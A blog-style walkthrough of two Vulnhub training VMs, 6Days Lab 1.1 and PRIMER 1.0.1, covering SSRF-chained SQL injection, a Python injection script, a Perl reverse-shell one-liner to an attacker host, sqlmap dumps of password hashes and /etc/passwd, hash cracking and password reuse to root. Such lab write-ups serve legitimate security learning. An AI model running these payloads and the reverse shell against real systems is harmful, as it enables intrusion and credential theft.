6 Days Lab 1.1 Vulnhub

Hello 😀

This is my walkthrough for the 6Days Lab 1.1 VM from Vulnhub.

Nmap
[screenshot: nmap scan of the target]

Look at the web app...
[screenshot]

Look at the page source...
[screenshot]

Before I check image.php, I want to try submitting something on the promocode form.
[screenshot]

I tried sqlmap with the chardoubleencode tamper option, but it was not successful; I think the IPS is blocking it, so let's find another way... Then I found a local file disclosure vulnerability in this web app: image.php passes the user-supplied src parameter to PHP's readfile(), which reads a local file or fetches a URL from another site and returns the content.

[screenshot]

I was stuck with this vulnerability for several hours... But after reading the Apache configuration on the target through it and looking back at the nmap result, I had an idea for another attack.

[screenshot]

Because readfile() also accepts URLs, the file disclosure bug doubles as SSRF: we can use it to reach port 8080 on the target from 127.0.0.1. Looking at checkpromo.php, the code is vulnerable to SQL injection, but because the IPS blocks malicious requests arriving from outside, the injection cannot be exploited directly.

[screenshot]

Okay, let's see whether the IPS still blocks the malicious request when the injection arrives from the target itself, through the SSRF.

Payload:

' union all select schema_name,null from information_schema.schemata#

Don't forget to double-encode the payload: it is URL-decoded twice on the way in, once when the outer server parses image.php's query string and once more when checkpromo.php on port 8080 parses its own, so only a double-encoded payload reaches the injection point intact.
[screenshot]

Whoops... a nice response from the target, but we need to find the right payload for this injection. Look back at the checkpromo.php code.
[screenshot]

The checkpromo.php source shows that when the row's "status" column is 0, the server answers "Code expired!", so the second column of our UNION must be non-zero. Send a payload slightly different from the previous one: replace null with a number, say 1, 2 or 3.

Payload:

' union all select schema_name,1 from information_schema.schemata#
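To make the status check concrete, here is an added example (not code from the original post) that emulates the vulnerable checkpromo.php logic with Python's sqlite3 as a stand-in for MySQL. Only the fancydb.users table with its username/password columns and the "Code expired!" behaviour are confirmed by the page; the promocodes table, its code/status columns, the sample rows and the exact response strings are assumptions made so the check can run offline. Two adjustments let the page's MySQL payloads run unchanged on sqlite: concat() is registered as a user function and the trailing '#' comment is rewritten to '--'. The page's first payload reads information_schema, which the stand-in lacks, so both the null and the 1 variant are run against fancydb.users here, next to a parameterised version of the same endpoint.

```python
import sqlite3

# Constructed stand-in for the target's database (see lead-in: everything
# except fancydb.users and its two columns is an assumption).
def build_db():
    db = sqlite3.connect(":memory:")
    # Attach a second in-memory database so the payload's "fancydb.users" resolves.
    db.execute("ATTACH DATABASE ':memory:' AS fancydb")
    db.executescript("""
        CREATE TABLE promocodes (code TEXT, status INTEGER);
        INSERT INTO promocodes VALUES ('SUMMER16', 1), ('WINTER15', 0);
        CREATE TABLE fancydb.users (username TEXT, password TEXT);
        INSERT INTO fancydb.users VALUES ('andrea', 'hash-placeholder-1'),
                                         ('guest',  'hash-placeholder-2');
    """)
    # MySQL's concat() does not exist in sqlite; register one that takes any arity.
    db.create_function("concat", -1, lambda *parts: "".join(str(p) for p in parts))
    return db


def checkpromo_vulnerable(db, promocode):
    """Emulates checkpromo.php: the promocode is concatenated into the query and
    any row whose status is 0 is reported as 'Code expired!'. PHP's
    `$row['status'] == 0` is also true for NULL, hence `not status` below."""
    # sqlite only knows '--' as a line comment, so translate MySQL's '#'.
    sql = ("SELECT code, status FROM promocodes WHERE code = '"
           + promocode.replace("#", "--") + "'")
    rows = db.execute(sql).fetchall()
    if not rows:
        return ["Invalid code!"]
    return ["Code expired!" if not status else "Valid code: %s" % code
            for code, status in rows]


def checkpromo_fixed(db, promocode):
    """Same logic with a parameterised query: the payload is just a string value."""
    rows = db.execute("SELECT code, status FROM promocodes WHERE code = ?",
                      (promocode,)).fetchall()
    if not rows:
        return ["Invalid code!"]
    return ["Code expired!" if not status else "Valid code: %s" % code
            for code, status in rows]


# The page's UNION payloads: the null variant trips the status check, the 1 variant does not.
PAYLOAD_NULL = "' union all select concat(username,':',password),null from fancydb.users#"
PAYLOAD_ONE = "' union all select concat(username,':',password),1 from fancydb.users#"

if __name__ == "__main__":
    db = build_db()
    for p in ("SUMMER16", PAYLOAD_NULL, PAYLOAD_ONE):
        print(repr(p))
        print("  vulnerable:", checkpromo_vulnerable(db, p))
        print("  fixed:     ", checkpromo_fixed(db, p))
```

Running it shows the null payload producing one "Code expired!" per leaked row (the NULL second column fails the status check just as 0 does), the 1 payload returning username:password pairs, and the parameterised endpoint treating both payloads as a code that simply does not exist.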


Okay, I wrote a small script (Python 3) to perform the injection more easily:

#!/usr/bin/env python3
import urllib.parse
import urllib.request

# image.php passes ?src= straight to readfile(), so we point it at the internal
# checkpromo.php on 127.0.0.1:8080. The promocode prefix is already double
# URL-encoded: %2527%2520 becomes %27%20 when the outer server decodes the
# query string and "' " when checkpromo.php decodes it again, so the payload
# appended to it must be double-encoded as well.
url = "http://192.168.1.103/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=%2527%2520"

def encode(sqli):
    enc = urllib.parse.quote_plus(sqli)
    doubleenc = urllib.parse.quote_plus(enc)
    print("Request : " + url + doubleenc + "\n")
    request(doubleenc)

def request(doubleenc):
    with urllib.request.urlopen(url + doubleenc) as resp:
        print(resp.read().decode("utf-8", errors="replace"))

# Dump username:password pairs; the constant 1 keeps the "status" column
# non-zero so the server does not answer "Code expired!".
encode("union all select concat(username,':',password),1 from fancydb.users#")


Yep, now we have credentials. We know from nmap that SSH is open on the target, so try logging in over SSH as user "andrea".
[screenshot]

Nice, the login succeeds, but there is a problem: we land in a restricted shell.
[screenshot]

:):):):):):) but Offsec says Try Harder!

An easy way out of the restricted shell is to spawn a reverse shell from an interpreter that is still reachable (python, perl or another language); in this case I use perl.

Perl code (with a listener waiting on 192.168.1.140:443, for example nc -lvnp 443):

perl -e 'use Socket;$i="192.168.1.140";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

[screenshot]

We have a real shell now. There is a "dog" binary on the box, but I had no idea how to root the box with it, so I just checked the kernel and OS version and exploited the "overlayfs" vulnerability.

[screenshot]

Local Exploit
[screenshot]

Flag
[screenshot]

Thank you vulnhub!

PRIMER 1.0.1 (SQL injection)

Filling some free time on an afternoon,

Lab PRIMER 1.0.1 – https://www.vulnhub.com/entry/primer-101,136/?override=1

Starting with nmap

root@kali:~# nmap -sC -sV 192.168.1.108

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-20 14:57 WIB
Nmap scan report for 192.168.1.108
Host is up (0.00017s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 01:2e:60:5f:99:48:3b:2f:c0:72:c6:ae:48:02:5e:33 (DSA)
|   2048 ed:26:be:cc:c6:2a:93:d1:e1:6d:0d:5a:53:7b:4d:fb (RSA)
|_  256 7f:4e:64:a0:c4:8a:13:8e:e9:86:3d:5d:49:04:c4:54 (ECDSA)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/4_8f14e45fceea167a5a36dedd4bea2543
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PRIMER
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          37649/tcp  status
|_  100024  1          47277/udp  status
MAC Address: 00:0C:29:0D:92:09 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.39 seconds

 

Check port 80
[screenshot]

Hmm, let's check the other interesting page, the one from the nmap output:
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/4_8f14e45fceea167a5a36dedd4bea2543
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PRIMER

[screenshot]

Click the "EOF" button.

[screenshot]

After opening this page, you can watch my short video to find more interesting pages.

[embedded video]

Stuck...
Try checking all the URLs you have collected so far:

4_8f14e45fceea167a5a36dedd4bea2543
5_6512bd43d9caa6e02c990b0a82652dca
6_c51ce410c124a10e0db5e4b97fc2af39
7_70efdf2ec9b086079795c442636b55fb

The suffix of each URL looks like an MD5 hash (a hash, not encryption, so it cannot be decrypted, only cracked or looked up). Split the URLs at the underscore and crack the hashes.
Watch my short video "again" for the next step 😀
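As an added example (not part of the original post), here is the identify-and-crack step in Python: each suffix is 32 hex digits, the shape of an MD5 digest, and since a hash cannot be reversed the only options are a lookup table or brute force over a guessed keyspace. The keyspace below, the decimal strings 0 to 99999, is an assumption chosen because short numeric strings are the usual first guess for hashes like these; crack_paths returns None for any digest outside the keyspace rather than failing.

```python
import hashlib
import re

# The four paths found on PRIMER (taken from the page).
PATHS = [
    "4_8f14e45fceea167a5a36dedd4bea2543",
    "5_6512bd43d9caa6e02c990b0a82652dca",
    "6_c51ce410c124a10e0db5e4b97fc2af39",
    "7_70efdf2ec9b086079795c442636b55fb",
]

MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def split_path(path):
    """'4_<hex>' -> ('4', '<hex>'); raise if the suffix is not MD5-shaped."""
    prefix, _, digest = path.partition("_")
    digest = digest.lower()
    if not MD5_RE.match(digest):
        raise ValueError("not a 32-hex-digit digest: %r" % path)
    return prefix, digest


def crack_md5(digests, candidates):
    """Brute force over a small keyspace: hash every candidate and keep the
    ones whose digest is wanted. Stops early once every digest is matched."""
    wanted = set(digests)
    found = {}
    for cand in candidates:
        h = hashlib.md5(cand.encode("utf-8")).hexdigest()
        if h in wanted and h not in found:
            found[h] = cand
            if len(found) == len(wanted):
                break
    return found


def crack_paths(paths, limit=100000):
    """Return [(prefix, preimage_or_None), ...] in the order the paths were given.
    Keyspace assumption: decimal strings "0" .. str(limit - 1)."""
    parts = [split_path(p) for p in paths]
    table = crack_md5([d for _, d in parts], (str(n) for n in range(limit)))
    return [(prefix, table.get(digest)) for prefix, digest in parts]


if __name__ == "__main__":
    for prefix, preimage in crack_paths(PATHS):
        print(prefix, "->", preimage)
    # -> 4 -> 7, 5 -> 11, 6 -> 13, 7 -> 17
```

The same job can be done with a generic lookup service or hashcat (MD5 is mode 0), but a ten-line brute force over the obvious keyspace is faster than leaving the box to ask the internet.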

And... stuck "again"...
After several minutes I still had no idea what to do with the terminal on the web page, so I went back to the home page and tried the login form with sqlmap:

root@kali:~# sqlmap -u "http://192.168.1.108/index.html" --form --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601180a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:05:10

[15:05:10] [INFO] testing connection to the target URL
[15:05:10] [INFO] searching for forms
[#1] form:
POST http://192.168.1.108:80/login.php
POST data: usr=&pw=&commit=Login
do you want to test this form? [Y/n/q] 
> 
Edit POST data [default: usr=&pw=&commit=Login] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] n
[15:05:13] [INFO] using '/root/.sqlmap/output/results-02202016_0305pm.csv' as the CSV results file in multiple targets mode
sqlmap got a 302 redirect to 'http://192.168.1.108:80/index.html'. Do you want to follow? [Y/n] n

------------SNIP------------

[15:05:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[15:05:25] [INFO] POST parameter 'usr' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[15:05:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:05:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:05:28] [INFO] checking if the injection point on POST parameter 'usr' is a false positive
POST parameter 'usr' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 95 HTTP(s) requests:
---
Parameter: usr (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: usr=' AND (SELECT * FROM (SELECT(SLEEP(5)))hAik) AND 'vdbv'='vdbv&pw=&commit=Login
---
do you want to exploit this SQL injection? [Y/n] 
[15:05:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[15:05:46] [INFO] fetching database names
[15:05:46] [INFO] fetching number of databases
[15:05:46] [INFO] retrieved: 
[15:05:46] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
5
[15:05:58] [INFO] retrieved: 
[15:06:03] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[15:07:14] [INFO] retrieved: mysql
[15:07:34] [INFO] retrieved: performance_schema
[15:08:44] [INFO] retrieved: phpmyadmin
[15:09:27] [INFO] retrieved: test
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

[15:09:44] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-02202016_0305pm.csv'

[*] shutting down at 15:09:44

The current database is "test", but there is nothing interesting in it, so just dump the mysql database to get the MySQL root password hash:

root@kali:~# sqlmap -u "http://192.168.1.108/index.html" --form -D mysql -T user -C User,Password --dump

----------SNIP---------

Database: mysql
Table: user
[6 entries]
+------------------+-------------------------------------------+
| User             | Password                                  |
+------------------+-------------------------------------------+
| debian-sys-maint | *0A799FB65F1A7F8E0B0F9C7CBE0983029BDF3D63 |
| phpmyadmin       | *EDDB5D9F648E137B72DC65A9904FBFC9FC4A4C25 |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
+------------------+-------------------------------------------+

[19:13:31] [WARNING] table 'mysql.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.1.108/dump/mysql/user-f3649c95.csv'
[19:13:31] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-02202016_0713pm.csv'

[*] shutting down at 19:13:31

Then crack the root hash (a MySQL 4.1+ hash: '*' followed by the uppercase hex of SHA1(SHA1(password))) and, whoops, the MySQL root password is "PRIMER".
[screenshot]
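As an added example (not part of the original post), the hash format and the crack in plain Python: MySQL's PASSWORD() for 4.1+ accounts is SHA1 applied to the raw 20-byte SHA1 of the password, hex-encoded in uppercase and prefixed with '*', which is exactly the shape of the dumped values above. The wordlist is constructed here from names seen on the box and is an assumption; hashcat mode 300 or john's mysql-sha1 format do the same thing at scale.

```python
import hashlib

# Root hash taken from the page's sqlmap dump of mysql.user.
ROOT_HASH = "*5452363E0EE57308206123984E21A8F6ECFF23CA"


def mysql_native_password(password):
    """MySQL 4.1+ PASSWORD(): '*' + uppercase hex of SHA1(SHA1(password)).
    The inner SHA1 is fed to the outer one as raw bytes, not as hex text;
    getting that wrong is the usual reason a home-grown cracker finds nothing."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def crack_mysql_hash(target, candidates):
    """Return the first candidate whose PASSWORD() hash equals target, else None."""
    target = target.upper()
    for cand in candidates:
        if mysql_native_password(cand) == target:
            return cand
    return None


# Constructed wordlist (assumption): the box name and user names are the first guesses.
WORDLIST = ["password", "root", "primer", "Primer", "PRIMER", "nieve", "erebus"]

if __name__ == "__main__":
    print(crack_mysql_hash(ROOT_HASH, WORDLIST))
```

Note that these hashes are unsalted, so one hash computation per candidate covers every account that shares a password; the four identical root rows in the dump are one crack, not four.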

So what can we gain from this password?
First check whether the web app's database user is a DBA: usually, if we can dump the mysql database, the user has DBA privileges, so try reading a file from the back end through the injection (sqlmap's --file-read uses LOAD_FILE(), which needs the FILE privilege):

root@kali:~# sqlmap -u "http://192.168.1.108/index.html" --form --threads=5 --file-read="/etc/passwd"

-----------SNIP-----------

[19:29:59] [INFO] the local file '/root/.sqlmap/output/192.168.1.108/files/_etc_passwd' and the remote file '/etc/passwd' have the same size (1493 B)
files saved to [1]:
[*] /root/.sqlmap/output/192.168.1.108/files/_etc_passwd (same file)

[19:29:59] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-02202016_0729pm.csv'

[*] shutting down at 19:29:59

Wohooo... "[*] /root/.sqlmap/output/192.168.1.108/files/_etc_passwd (same file)" means the file was extracted successfully and matches the remote file's size.

passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
nieve:x:1000:1000:nieve,,,:/home/nieve:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false

There is a regular user on this machine, nieve, so try logging in to the SSH service as "nieve" with the password "PRIMER" (password reuse).
[screenshot]
But wait... "PRIMER" is the MySQL root password, so let's try to get root on the box with the same password, just trying my luck.
[screenshot]
BINGGOOO!!!
I don't know whether this is the intended way, but it's my way and I love my way :p

Appendix
MYSQL Credentials
root:PRIMER

User Machine Credentials
nieve:PRIMER
root:PRIMER

Web terminal – passwords to connect to the hosts
Erebus
falken:joshua1984
mccarthy:m4xw*311#

TrivialZ3r0
falken:Riemann

Wintermute
chaos:2.718281828459045

Zephis
nieve:08rf8h23

Thank you PRIMER and vulnhub!
lol